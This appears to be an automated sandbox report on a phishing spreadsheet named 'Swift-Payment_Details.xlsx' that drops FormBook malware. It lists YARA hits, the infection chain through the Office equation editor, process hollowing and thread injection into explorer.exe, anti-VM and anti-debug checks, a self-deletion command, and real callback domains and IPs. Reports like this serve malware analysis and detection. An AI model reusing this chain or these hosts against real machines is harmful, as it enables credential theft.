Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Binary contains paths to development resources

Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/13@6/6

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Swift-Payment_Details.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF42D.tmp

Jump to behavior

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: Swift-Payment_Details.xlsx

ReversingLabs: Detection: 28%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Submission file is bigger than most known malware samples

Source: Swift-Payment_Details.xlsx

Static file information: File size 1326080 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe, wscript.exe
Source:	Binary string: wscript.pdb source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
Source:	Binary string: wscript.pdbN source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp

Document has a 'vbamacros' value indicative of goodware

Source: Swift-Payment_Details.xlsx

Initial sample: OLE indicators vbamacros = False

Document has an 'encrypted' value indicative of goodware

Source: Swift-Payment_Details.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 7.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_00403DDB

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 7_2_004062F6 pushfd ; ret		7_2_004062F7
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3C5 push eax; ret		7_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004153FC push eax; retf		7_2_0041540B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B47C push eax; ret		7_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B412 push eax; ret		7_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B41B push eax; ret		7_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00415CE7 pushad ; ret		7_2_00415D4B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041C4EE push 133511A3h; retf		7_2_0041C4F3
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00414D71 push ss; iretd		7_2_00414D72
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00415D38 pushad ; ret		7_2_00415D4B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0243DFA1 push ecx; ret		9_2_0243DFB4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_000762F6 pushfd ; ret		9_2_000762F7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0008B3C5 push eax; ret		9_2_0008B418
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_000853FC push eax; retf		9_2_0008540B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0008B41B push eax; ret		9_2_0008B482
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0008B412 push eax; ret		9_2_0008B418
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0008B47C push eax; ret		9_2_0008B482
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0008C4EE push 133511A3h; retf		9_2_0008C4F3
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00085CE7 pushad ; ret		9_2_00085D4B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00085D38 pushad ; ret		9_2_00085D4B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00084D71 push ss; iretd		9_2_00084D72

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Document contains OLE streams with high entropy indicating encrypted embedded content

Source: Swift-Payment_Details.xlsx

Stream path 'EncryptedPackage' entropy: 7.99889031885 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 00000000000785F4 second address: 00000000000785FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 000000000007898E second address: 0000000000078994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 7_2_004088C0 rdtsc

7_2_004088C0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 552	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 2632	Thread sleep time: -36000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000008.00000000.2187955907.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2170082366.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000000.2170546852.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2170082366.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000000.2187992408.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 7_2_004088C0 rdtsc

7_2_004088C0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 7_2_00409B30 LdrLoadDll,

7_2_00409B30

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_00403DDB

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002606DA mov eax, dword ptr fs:[00000030h]		6_2_002606DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002608EE mov eax, dword ptr fs:[00000030h]		6_2_002608EE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002609DE mov eax, dword ptr fs:[00000030h]		6_2_002609DE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0026099F mov eax, dword ptr fs:[00000030h]		6_2_0026099F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00260A1C mov eax, dword ptr fs:[00000030h]		6_2_00260A1C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009726F8 mov eax, dword ptr fs:[00000030h]		7_2_009726F8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024426F8 mov eax, dword ptr fs:[00000030h]		9_2_024426F8

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 62.149.128.40 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 173.255.194.134 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.envisionfordheights.com
Source: C:\Windows\explorer.exe	Domain query: www.theshapecreator.com
Source: C:\Windows\explorer.exe	Network Connect: 184.168.131.241 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.melodezu.com
Source: C:\Windows\explorer.exe	Network Connect: 64.227.87.162 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.194 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.scuolatua.com
Source: C:\Windows\explorer.exe	Domain query: www.anthonysavillemiddleschool.com

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 140000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000008.00000000.2162798517.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2372390654.0000000000A30000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2162798517.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2372390654.0000000000A30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.2187955907.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2162798517.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2372390654.0000000000A30000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query windows version

Source: C:\Users\Public\vbc.exe

Code function: 6_2_0040205A EntryPoint,GetVersion,GetStartupInfoW,GetModuleHandleA,

6_2_0040205A

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY